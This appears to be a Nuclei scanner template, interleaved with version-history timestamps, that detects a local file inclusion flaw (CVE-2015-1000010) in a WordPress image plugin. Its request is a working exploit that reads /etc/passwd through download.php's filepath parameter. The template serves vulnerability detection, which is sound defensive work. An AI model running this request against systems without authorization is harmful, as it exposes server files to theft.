2022-08-06 16:54:58 +00:00
id : CVE-2015-1000010
2022-02-12 18:14:11 +00:00
info :
2022-08-06 16:54:58 +00:00
name : WordPress Simple Image Manipulator < 1.0 - Local File Inclusion
2022-02-12 18:14:11 +00:00
author : dhiyaneshDK
severity : high
2022-08-10 07:43:58 +00:00
description : |
WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location.
2023-09-06 13:22:34 +00:00
remediation : |
Update to the latest version of the WordPress Simple Image Manipulator plugin.
2022-04-22 10:38:41 +00:00
reference :
- https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
2022-08-06 16:54:58 +00:00
- https://wpscan.com/vulnerability/40e84e85-7176-4552-b021-6963d0396543
2022-08-10 07:43:58 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2015-1000010
2022-08-25 08:56:24 +00:00
- http://www.vapidlabs.com/advisory.php?v=147
2022-07-29 14:04:23 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-08-06 16:54:58 +00:00
cve-id : CVE-2015-1000010
2023-07-11 19:49:27 +00:00
cwe-id : CWE-284
2023-10-14 11:27:55 +00:00
epss-score : 0.03171
2023-10-19 10:38:59 +00:00
epss-percentile : 0.9002
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:simple-image-manipulator_project:simple-image-manipulator:1.0:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : simple-image-manipulator_project
product : simple-image-manipulator
2023-09-06 13:22:34 +00:00
framework : wordpress
2023-07-11 19:49:27 +00:00
tags : packetstorm,wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp
2022-02-12 18:14:11 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-12 18:14:11 +00:00
- method : GET
path :
- '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200